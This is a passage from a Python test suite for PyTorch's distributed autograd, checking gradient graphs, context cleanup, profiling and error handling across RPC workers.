list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
# There should be at least 1 send and recv_events each, corresponding to send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
# The CPU total for backward event should be great than send and recv, since
# applying those functions in the backwards pass is a subset of the entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank2 with trainers = rank2/3/0
# ps = rank3 with trainers = rank3/0/1
# ps = rank4 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
